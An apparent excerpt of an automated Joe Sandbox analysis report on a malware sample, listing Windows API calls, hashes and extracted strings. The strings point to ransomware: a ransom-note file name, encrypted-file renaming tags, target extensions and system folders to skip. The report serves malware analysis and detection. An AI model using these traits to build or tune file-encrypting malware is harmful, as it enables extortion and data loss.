                                                                                                        • Instruction Fuzzy Hash: D431CA71D01535DBCB34EBA4A84156FBBF8EF41321B2101E6E909A7291DA305E44CBE1
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00A729AB
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A729FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                        • String ID: bad locale name
                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                        • Opcode ID: 17c5c674613c72e9360b78a7e2f05edfd762423a5646e581a7737eefd9850bb4
                                                                                                        • Instruction ID: ab1c86aeb84b237817a66e332c1a86d33ebf3e7df1030df1b54232dd3c729a8d
                                                                                                        • Opcode Fuzzy Hash: 17c5c674613c72e9360b78a7e2f05edfd762423a5646e581a7737eefd9850bb4
                                                                                                        • Instruction Fuzzy Hash: 1211A071904B849FD320CF69C901747BBF4EF19710F008A6EE499D7B81D7B5A504CB95
                                                                                                        APIs
                                                                                                        • NetApiBufferFree.NETAPI32(00000000), ref: 00A84606
                                                                                                        • NetApiBufferFree.NETAPI32(00000000), ref: 00A84622
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BufferFree
                                                                                                        • String ID: Default
                                                                                                        • API String ID: 710964542-753088835
                                                                                                        • Opcode ID: 3a16fef91b96c75a33301aa7941a509c3be718f4cd48c3e246803160f8645c2e
                                                                                                        • Instruction ID: d61133c36510053c9e1a69812f48b739f81bfb85322d6315eecc0bc42c20382d
                                                                                                        • Opcode Fuzzy Hash: 3a16fef91b96c75a33301aa7941a509c3be718f4cd48c3e246803160f8645c2e
                                                                                                        • Instruction Fuzzy Hash: 0BF04F31A0520A9BDB18EF58E591BADF7B1EB4D321F14427ED81663690EB36A9008B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 004d4438c54c38b1471e2c6b9a55bdee31e1276da741325f1821c07df276dfe1
                                                                                                        • Instruction ID: 8444023c7ffad0da687da457eb9c650b8f34718bfe9840d5203d834d232d3103
                                                                                                        • Opcode Fuzzy Hash: 004d4438c54c38b1471e2c6b9a55bdee31e1276da741325f1821c07df276dfe1
                                                                                                        • Instruction Fuzzy Hash: A8519171D10A19EBDB319FA8D885FEE7BF8EF05324F640099E414A7291D7709941CBA1
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,00AE8F4C,?,00B3587B,00AE8F4C,00B8CE88,0000000C), ref: 00B359B3
                                                                                                        • GetLastError.KERNEL32(?,00B3587B,00AE8F4C,00B8CE88,0000000C), ref: 00B359BD
                                                                                                        • __dosmaperr.LIBCMT ref: 00B359E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2583163307-0
                                                                                                        • Opcode ID: 74ddfe6799f75db100cfa70433fe852fd977ee75673985645a35b832b9381d92
                                                                                                        • Instruction ID: 96974c2438547b22511068f04c391ac24f5bf0bb8a01ca58a2d144e35fb9d248
                                                                                                        • Opcode Fuzzy Hash: 74ddfe6799f75db100cfa70433fe852fd977ee75673985645a35b832b9381d92
                                                                                                        • Instruction Fuzzy Hash: E8014937604A309AD63427B8AC8577E7BC9CB8AB34F3907DAF8189B1D1DE21DC81C250
                                                                                                        APIs
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00AE8F76,00000000,00000002,00AE8F76,00000000,?,?,?,00B3900C,00000000,00000000,00AE8F76,00000002), ref: 00B38F96
                                                                                                        • GetLastError.KERNEL32(?,00B3900C,00000000,00000000,00AE8F76,00000002,?,00B2AA52,?,00000000,00000000,00000001,?,00AE8F76,?,00B2AB07), ref: 00B38FA0
                                                                                                        • __dosmaperr.LIBCMT ref: 00B38FA7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2336955059-0
                                                                                                        • Opcode ID: 737278ab5b0dbdbf2d6d4992bb730991cd6cf0fd7f5a7e3fb3b0f1d2298fa63c
                                                                                                        • Instruction ID: 0f1e689a8728e488ef769869c4559cb2a0bde347e69057c5bdc342d760576bbe
                                                                                                        • Opcode Fuzzy Hash: 737278ab5b0dbdbf2d6d4992bb730991cd6cf0fd7f5a7e3fb3b0f1d2298fa63c
                                                                                                        • Instruction Fuzzy Hash: 26014032610714ABCB059FA8EC05DAE7B9AEB85330F380285F815972D0EE71ED50CBD1
                                                                                                        APIs
                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00A86821
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileInternetRead
                                                                                                        • String ID: `
                                                                                                        • API String ID: 778332206-3189776409
                                                                                                        • Opcode ID: da8e55eb114dd8a61b29364797d920febfa3170e30017a8cb595c3da8fd24baa
                                                                                                        • Instruction ID: 381cb23aa8215778670d5b410fe08c287db019b461ad03f2e415f4f7f4720dfa
                                                                                                        • Opcode Fuzzy Hash: da8e55eb114dd8a61b29364797d920febfa3170e30017a8cb595c3da8fd24baa
                                                                                                        • Instruction Fuzzy Hash: 5151A4B1A101588BEB28DF24CD847DDB7B5EF85304F1482D9E508A7281D775AEC8CF59
                                                                                                        APIs
                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,00000000), ref: 00A8444D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1890195054-2766056989
APIs
• WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,00B2AB2E,E0830C40,?,00B3577F,00AE8F76,00B2AB2E,?,00B2AB2E,00B2AB2E,00AE8F76), ref: 00B352DE
• GetLastError.KERNEL32(?,00B3577F,00AE8F76,00B2AB2E,?,00B2AB2E,00B2AB2E,00AE8F76,00B2AB2E,?,00B8CE68,00000014,00B21B64,00000000,8304488B,00AE8F76), ref: 00B35307
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
APIs
Similarity
• API ID: Xfsopenstd::_
• String ID:
• API String ID: 2914972069-0
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00B33BA9
• GetFileType.KERNEL32(00000000), ref: 00B33BBB
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
APIs
• GlobalMemoryStatusEx.KERNEL32(AE695AF0), ref: 00A85DAF
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
APIs
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00B34D09: HeapAlloc.KERNEL32(00000008,?,00000000,?,00B3442F,00000001,00000364,?,00B17B27,?,?,?,?,?,00A71F07,?), ref: 00B34D4A
• _free.LIBCMT ref: 00B30693
  • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
  • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
Similarity
• API ID: Heap$AllocErrorFreeLast_free
• String ID:
• API String ID: 3091179305-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
  • Part of subcall function 00B35B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
• _free.LIBCMT ref: 00B35B57
  • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
  • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Heap$AllocateErrorFreeLast_free
• String ID:
• API String ID: 314386986-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B01B69
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
APIs
• EnumWindows.USER32(00A852E0,?), ref: 00A85900
Similarity
• API ID: EnumWindows
• String ID:
• API String ID: 1129996299-0
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00B40739,?,?,00000000,?,00B40739,00000000,0000000C), ref: 00B4037B
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 00B259C6: MoveFileExW.KERNEL32(?,?,00000002), ref: 00B259D3
  • Part of subcall function 00B259C6: GetLastError.KERNEL32 ref: 00B259DD
  • Part of subcall function 00B259C6: __dosmaperr.LIBCMT ref: 00B259E4
• CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,08000000,00000000,?,?,?,?,?), ref: 00A7DBE6
• GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 00A7DC5C
• SetFilePointerEx.KERNEL32(?,000000FA,000000FF,00000000,00000002,$f1;,00B6C080,00000000), ref: 00A7E106
• ReadFile.KERNEL32(?,00000000,00000006,?,00000000), ref: 00A7E12A
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00A7E25B
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00A7E2E8
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00A7E304
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E4A4
• WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E4CD
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000002,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E6FE
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E71A
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00B6820F,00000000,00B6820F,00000000), ref: 00A7E7F1
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,?,00000000), ref: 00A7E87A
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001,?,00B6820F), ref: 00A7EAD9
• WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001,?,00B6820F,00000000), ref: 00A7EB02
• SetFilePointerEx.KERNEL32(?,000000EA,000000FF,00000000,00000002,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7ED49
• ReadFile.KERNEL32(?,00000000,00000016,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7ED6D
• SetFilePointerEx.KERNEL32(?,-00000016,?,00000000,00000002), ref: 00A7EDA9
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,00000002), ref: 00A7EDC5
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00B6820F,00000000,00B6820F,00000000,00B6820F,00000000), ref: 00A7EF8A
• ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,00000000), ref: 00A7F022
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7F26A
• WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7F28E
• SetFilePointerEx.KERNEL32(?,000000EA,000000FF,00000000,00000002,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A7F3CC
• ReadFile.KERNEL32(?,00000000,00000016,?,00000000,00000016,00000000,00B6820F), ref: 00A7F402
• SetFilePointerEx.KERNEL32(?,00000016,?,00000000,00000002,Fs1z3,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A7F42D
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,00000002,Fs1z3,00000000), ref: 00A7F442
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7F463
Strings
Similarity
• API ID: File$Pointer$Write$Read$CloseCreateErrorHandleLastMoveSize__dosmaperr
• String ID: $f1;$&4r*3d$Fs1z3$P7A1s$_Eg$jgdg$jgdg$sxuo
• API String ID: 4290145678-3488327756
APIs
• lstrcmpW.KERNEL32(?,00B6FF18), ref: 00A89E1B
• lstrcmpW.KERNEL32(?,00B6FF1C), ref: 00A89E31
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A8A10E
• FindNextFileW.KERNEL32(?,?), ref: 00A8A166
• FindClose.KERNEL32(?), ref: 00A8A175
• SetErrorMode.KERNEL32(00008003,AE695AF0), ref: 00A8AF9D
• FindFirstFileW.KERNEL32(?,?,00B6FBE0,00000002), ref: 00A8AFC5
  • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A7376D
  • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A737B2
  • Part of subcall function 00A7AD10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7ADEE
Strings
Similarity
• API ID: Find$Exception@8FileIos_base_dtorThrowlstrcmpstd::ios_base::_$CloseErrorFirstModeNext
• String ID: .K0H$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$0$5$\Restore_Your_Files.txt$_Eg$_Enc$_Mail-$_[ID-
• API String ID: 420669261-666215559
                                                                                                        • Opcode ID: c58bb66fc5a8c34373e69069999e284d93b3ba060fb018af7f4b4c88bf8131ca
                                                                                                        • Instruction ID: 1080507e444821e95a745b5de2cef15228ebd3bef9d7b9b230cdea735bc8ecd4
                                                                                                        • Opcode Fuzzy Hash: c58bb66fc5a8c34373e69069999e284d93b3ba060fb018af7f4b4c88bf8131ca
                                                                                                        • Instruction Fuzzy Hash: 63C29C71E006198EEF24EF24CD85BEEB7B1AF54305F5082E9E519A7290DB34AE85CF41
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\WINDOWS$\Windows$\skips.txt$user
                                                                                                        • API String ID: 0-188129770
                                                                                                        • Opcode ID: 4e2391f12565bb7b2f871811c9ff6774485d5ff515a3bba5e9dfbecda8b5520c
                                                                                                        • Instruction ID: 65644304399bd3b64f12e8f8f6f716e998f8a4a82211d92cdd18d47f4e4cf589
                                                                                                        • Opcode Fuzzy Hash: 4e2391f12565bb7b2f871811c9ff6774485d5ff515a3bba5e9dfbecda8b5520c
                                                                                                        • Instruction Fuzzy Hash: 67622270E00619CFDF14DF68D955BEEB7B1FB58305F5082A9D418A7290EB74AA88CF90
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A7376D
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A737B2
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A8816A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                                                                                        • String ID: &4r*3d$($.K0H$21L0I$_Mail-$_[ID-$vj10au=$vj20au=$vj30au=$vj51au=$vj55au=$vjau=$wenf=
                                                                                                        • API String ID: 2823994529-3162937380
                                                                                                        • Opcode ID: 6b1263c7520ec77c0e7e3b771f9e05656c0fab6d9baf57314034581971f3eae2
                                                                                                        • Instruction ID: 80ae83f7aa1a2831ed83d160c1eae5ac7c5b14b5a7ef046ee88f6f788b26ea22
                                                                                                        • Opcode Fuzzy Hash: 6b1263c7520ec77c0e7e3b771f9e05656c0fab6d9baf57314034581971f3eae2
                                                                                                        • Instruction Fuzzy Hash: 04A2E131A14259CBDB24EF28CD59BDDBBB1EF55304F2082D8D049AB2A1DB75AAC4CF50
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,GetLogicalProcessorInformation,?), ref: 00A85AFA
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A85B01
                                                                                                        • GetLastError.KERNEL32 ref: 00A85B3F
                                                                                                        Strings
                                                                                                        • Error: Allocation failure, xrefs: 00A85B6D
                                                                                                        • Error %d, xrefs: 00A85B8E
                                                                                                        • GetLogicalProcessorInformation is not supported., xrefs: 00A85B0F
                                                                                                        • kernel32, xrefs: 00A85AE1
                                                                                                        • GetLogicalProcessorInformation, xrefs: 00A85ADC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                                                        • String ID: Error %d$Error: Allocation failure$GetLogicalProcessorInformation is not supported.$GetLogicalProcessorInformation$kernel32
                                                                                                        • API String ID: 4275029093-3269863577
                                                                                                        • Opcode ID: 43f712ced460163b1d7206603738d00f883adbbfb48cc2b71daa6fe2e75432a5
                                                                                                        • Instruction ID: 812927eb3bd2a276e5227a28c6645dd795fe3156518f658b6be2b46545061744
                                                                                                        • Opcode Fuzzy Hash: 43f712ced460163b1d7206603738d00f883adbbfb48cc2b71daa6fe2e75432a5
                                                                                                        • Instruction Fuzzy Hash: AE710571A14B418BD718EF38DC8562EB7E1EFC4310F444A6DF88997291EB74ED858B82
                                                                                                        APIs
